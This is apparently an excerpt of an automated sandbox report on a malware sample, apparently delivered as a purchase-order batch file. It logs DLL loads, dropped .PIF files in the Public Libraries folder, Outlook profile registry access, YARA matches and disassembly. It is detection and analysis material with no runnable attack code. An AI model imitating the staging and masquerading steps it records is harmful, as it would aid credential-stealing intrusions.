Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: xmllite.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: gpapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: apphelp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: version.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: uxtheme.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: url.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ieframe.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: iertutil.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: netapi32.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: userenv.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: winhttp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: wkscli.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: netutils.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: amsi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: smartscreenps.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: kernel.appcore.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: winmm.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: wininet.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sspicli.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: windows.storage.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: wldp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: profapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ieproxy.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ieproxy.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ieproxy.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: mswsock.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: iphlpapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: winnsi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ??????????.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ??.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ???.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ???.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ???.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: am.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ????.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ???e???????????.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ???e???????????.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ?.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: ??l.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: tquery.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: cryptdll.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: spp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: vssapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: vsstrace.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: spp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: vssapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: vsstrace.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: mssip32.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: endpointdlp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: advapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: spp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: vssapi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: vsstrace.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppwmi.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: slc.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppcext.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: winscard.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: devobj.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: cryptsp.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: rsaenh.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: cryptbase.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIF | Section loaded: sppc.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: kernel.appcore.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: uxtheme.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: mscoree.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: wldp.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: amsi.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: userenv.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: profapi.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: version.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: msasn1.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: gpapi.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: cryptsp.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: rsaenh.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: cryptbase.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: windows.storage.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: textshaping.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: textinputframework.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: coreuicomponents.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: coremessaging.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: ntmarta.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: coremessaging.dll
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Section loaded: wintypes.dll
                      Source: C:\Windows\System32\cscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                      Source: apihost.exe.lnk.12.dr | LNK file: ..\..\..\..\..\ACCApi\apihost.exe
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Automated click: OK
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Automated click: OK
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: PO#3_RKG367.bat | Static file information: File size 2158506 > 1048576
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000006.00000003.2437514214.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007ECB9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2528347556.0000000021CA6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437514214.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F209000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436773269.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588721035.000000000084F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdb source: rpkhzpuO.pif, 00000018.00000002.2716549443.000000002FFA9000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: x.exe, 00000006.00000002.2533914896.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020A79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC50000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.00000000209E5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A16000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: _.pdb source: rpkhzpuO.pif, 0000000A.00000003.2448553311.000000002D0DE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000018.00000002.2741756362.00000000343B0000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000018.00000002.2718853988.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000018.00000003.2609245491.000000002FFBA000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000018.00000002.2740855997.0000000032F75000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001D.00000003.2772871636.00000000234E1000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001D.00000002.2881899810.0000000026485000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 0000001D.00000002.2869962358.00000000250F0000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 0000001D.00000002.2869415210.0000000024E93000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: rpkhzpuO.pif, 00000018.00000003.2636484466.000000002FFF7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: rpkhzpuO.pif, 00000018.00000002.2716549443.000000002FFDB000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000006.00000003.2437138708.0000000021B12000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2533914896.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2437138708.0000000021B41000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020AC2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000002.2508181748.0000000020A79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.2436310186.000000007EC50000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 0000000A.00000001.2446233147.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A2E000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.00000000209E5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588114567.0000000000822000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000003.2588114567.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000015.00000002.2652352193.0000000020A16000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000019.00000003.2749710698.0000000000723000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000019.00000003.2749710698.00000000006FA000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Unpacked PE file: 24.2.rpkhzpuO.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Unpacked PE file: 29.2.rpkhzpuO.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Unpacked PE file: 24.2.rpkhzpuO.pif.400000.0.unpack
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pif | Unpacked PE file: 29.2.rpkhzpuO.pif.400000.0.unpack
                      Source: Yara match | File source: 6.2.x.exe.2c30000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.x.exe.22665a8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.x.exe.22665a8.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000006.00000002.2536406675.000000007FAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.2464206701.0000000002266000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000001.2446233147.00000000013E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: rpkhzpuO.pif.6.dr | Static PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C487A0 LoadLibraryW,GetProcAddress,FreeLibrary, | 6_2_02C487A0
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C372D7 push FFFFFFC3h; ret | 6_2_02C37316
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C372D7 push FFFFFFC3h; ret | 6_2_02C37372
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C5C2FC push 02C5C367h; ret | 6_2_02C5C35F
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C332FC push eax; ret | 6_2_02C33338
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C3728F push FFFFFFC3h; ret | 6_2_02C372B6
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C432AF push FFFFFFC3h; ret | 6_2_02C432E6
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C432AF push FFFFFFC3h; ret | 6_2_02C4333E
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C43257 push 8402C336h; ret | 6_2_02C431F9
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C43257 push FFFFFFC3h; ret | 6_2_02C432E6
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C37223 push FFFFFFC3h; ret | 6_2_02C372B6
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 6_2_02C37233 push FFFFFFC3h; ret | 6_2_02C3725A
